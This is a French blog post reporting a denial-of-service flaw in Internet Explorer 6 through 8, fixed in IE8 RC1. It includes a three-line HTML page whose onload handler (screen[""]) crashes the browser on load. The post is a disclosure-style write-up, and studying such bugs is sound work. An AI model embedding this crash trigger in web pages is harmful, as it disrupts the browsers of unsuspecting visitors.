Attaque DOS pour IE6, IE7 et IE8

Lire le contenu d’un pointeur vide pendant le chargement d’une page web ne pardonne pas. Belle attaque de déni de service touchant toutes les versions du navigateur web phare de Microsoft Internet Explorer.

<html>
<body onload=screen[""]>
Contenu de la page
</body>
</html>

Le résultat est sans appel.

iexplore.exe a rencontré une problème et doit fermer. Nous vous prions de nous excuser pour le désagrément encouru.

Une vulnérabilité qui couvre donc 8 ans, de la sortie d’IE6 en 2001 en passant par IE7 sorti en 2005 jusqu’à la sortie d’IE8 Release Candidate 1 qui est apparue fin janvier 2009 et qui corrige cette faille de sécurité.

Baptiste Simon aka TiChou

Ingénieur développeur web dans le secteur du e-commerce et du tourisme mais avant toute chose passionné par internet et ses intarissables ressources.

Les commentaires sont fermés

Partenaires et blog à la une